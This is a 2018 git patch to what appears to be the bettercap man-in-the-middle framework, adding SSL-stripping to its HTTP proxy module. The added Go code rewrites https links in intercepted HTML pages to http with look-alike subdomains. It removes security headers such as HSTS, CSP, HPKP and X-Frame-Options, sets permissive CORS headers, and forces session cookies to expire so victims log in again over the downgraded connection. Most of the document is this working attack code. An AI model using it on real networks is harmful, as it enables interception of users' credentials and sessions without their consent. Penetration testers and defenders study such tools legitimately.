From 62112b0ae40f211014a6925713b1b1a26ce9e27c Mon Sep 17 00:00:00 2001 From: evilsocket Date: Thu, 8 Mar 2018 20:28:12 +0100 Subject: [PATCH] stripping is done, only resolution of fake domains is needed (ref #154) --- modules/http_proxy_base_filters.go | 2 + modules/http_proxy_base_sslstriper.go | 133 ++++++++++++++++++++++---- 2 files changed, 117 insertions(+), 18 deletions(-) diff --git a/modules/http_proxy_base_filters.go b/modules/http_proxy_base_filters.go index b2816669..acf52d0e 100644 --- a/modules/http_proxy_base_filters.go +++ b/modules/http_proxy_base_filters.go @@ -54,6 +54,8 @@ func (p *HTTPProxy) onResponseFilter(res *http.Response, ctx *goproxy.ProxyCtx) req := res.Request log.Debug("(%s) > %s %s %s%s", core.Green(p.Name), req.RemoteAddr, req.Method, req.Host, req.URL.Path) + p.stripper.Process(res, ctx) + // do we have a proxy script? if p.Script == nil { return res diff --git a/modules/http_proxy_base_sslstriper.go b/modules/http_proxy_base_sslstriper.go index e095e03f..cd30301a 100644 --- a/modules/http_proxy_base_sslstriper.go +++ b/modules/http_proxy_base_sslstriper.go @@ -2,7 +2,9 @@ package modules import ( "fmt" + "io/ioutil" "net/http" + "regexp" "strings" "sync" @@ -13,6 +15,16 @@ import ( "github.com/jpillora/go-tld" ) +var ( + httpsLinksParser = regexp.MustCompile(`https://[^"'/]+`) + subdomains = map[string]string{ + "www": "wwwww", + "webmail": "wwebmail", + "mail": "wmail", + "m": "wmobile", + } +) + type cookieTracker struct { sync.RWMutex set map[string]bool @@ -63,15 +75,13 @@ func (t *cookieTracker) IsClean(req *http.Request) bool { return false } -func (t *cookieTracker) track(req *http.Request) { +func (t *cookieTracker) Track(req *http.Request) { t.Lock() defer t.Unlock() t.set[t.keyOf(req)] = true } -func (t *cookieTracker) TrackAndExpire(req *http.Request, ctx *goproxy.ProxyCtx) *http.Response { - t.track(req) - +func (t *cookieTracker) Expire(req *http.Request) *http.Response { domain := t.domainOf(req) redir := goproxy.NewResponse(req, "text/plain", 302, "") @@ -98,6 +108,35 @@ func NewSSLStripper(enabled bool) *SSLStripper { } } +func (s *SSLStripper) stripRequestHeaders(req *http.Request) { + req.Header.Del("Accept-Encoding") + req.Header.Del("If-None-Match") + req.Header.Del("If-Modified-Since") + req.Header.Del("Upgrade-Insecure-Requests") + + req.Header.Set("Pragma", "no-cache") +} + +func (s *SSLStripper) stripResponseHeaders(res *http.Response) { + res.Header.Del("Content-Security-Policy-Report-Only") + res.Header.Del("Content-Security-Policy") + res.Header.Del("Strict-Transport-Security") + res.Header.Del("Public-Key-Pins") + res.Header.Del("Public-Key-Pins-Report-Only") + res.Header.Del("X-Frame-Options") + res.Header.Del("X-Content-Type-Options") + res.Header.Del("X-WebKit-CSP") + res.Header.Del("X-Content-Security-Policy") + res.Header.Del("X-Download-Options") + res.Header.Del("X-Permitted-Cross-Domain-Policies") + res.Header.Del("X-Xss-Protection") + + res.Header.Set("Allow-Access-From-Same-Origin", "*") + res.Header.Set("Access-Control-Allow-Origin", "*") + res.Header.Set("Access-Control-Allow-Methods", "*") + res.Header.Set("Access-Control-Allow-Headers", "*") +} + // sslstrip preprocessing, takes care of: // // - patching / removing security related headers @@ -108,26 +147,84 @@ func (s *SSLStripper) Preprocess(req *http.Request, ctx *goproxy.ProxyCtx) (redi return } - // preeprocess headers - req.Header.Set("Pragma", "no-cache") - for name, _ := range req.Header { - if name == "Accept-Encoding" { - req.Header.Del(name) - } else if name == "If-None-Match" { - req.Header.Del(name) - } else if name == "If-Modified-Since" { - req.Header.Del(name) - } else if name == "Upgrade-Insecure-Requests" { - req.Header.Del(name) - } - } + // preprocess request headers + s.stripRequestHeaders(req) // check if we need to redirect the user in order // to make unknown session cookies expire if s.cookies.IsClean(req) == false { log.Info("[%s] Sending expired cookies for %s to %s", core.Green("sslstrip"), core.Yellow(req.Host), req.RemoteAddr) - redir = s.cookies.TrackAndExpire(req, ctx) + s.cookies.Track(req) + redir = s.cookies.Expire(req) } return } + +func (s *SSLStripper) isHTML(res *http.Response) bool { + for name, values := range res.Header { + for _, value := range values { + if name == "Content-Type" { + return strings.HasPrefix(value, "text/html") + } + } + } + + return false +} + +func (s *SSLStripper) processURL(url string) string { + // first we remove the https schema + url = strings.Replace(url, "https://", "http://", 1) + + // search for a known subdomain and replace it + found := false + for sub, repl := range subdomains { + what := fmt.Sprintf("://%s", sub) + with := fmt.Sprintf("://%s", repl) + if strings.Contains(url, what) { + url = strings.Replace(url, what, with, 1) + found = true + break + } + } + // fallback + if found == false { + url = strings.Replace(url, "://", "://wwww.", 1) + } + + return url +} + +func (s *SSLStripper) Process(res *http.Response, ctx *goproxy.ProxyCtx) { + if s.Enabled == false { + return + } else if s.isHTML(res) == false { + return + } + + // process response headers + // s.stripResponseHeaders(res) + + // fetch the HTML body + raw, err := ioutil.ReadAll(res.Body) + if err != nil { + log.Error("Could not read response body: %s", err) + return + } + + body := string(raw) + urls := make(map[string]string, 0) + matches := httpsLinksParser.FindAllString(body, -1) + for _, url := range matches { + urls[url] = s.processURL(url) + } + + for url, stripped := range urls { + log.Info("Stripping url %s to %s", core.Bold(url), core.Yellow(stripped)) + body = strings.Replace(body, url, stripped, -1) + } + + // reset the response body to the original unread state + res.Body = ioutil.NopCloser(strings.NewReader(body)) +}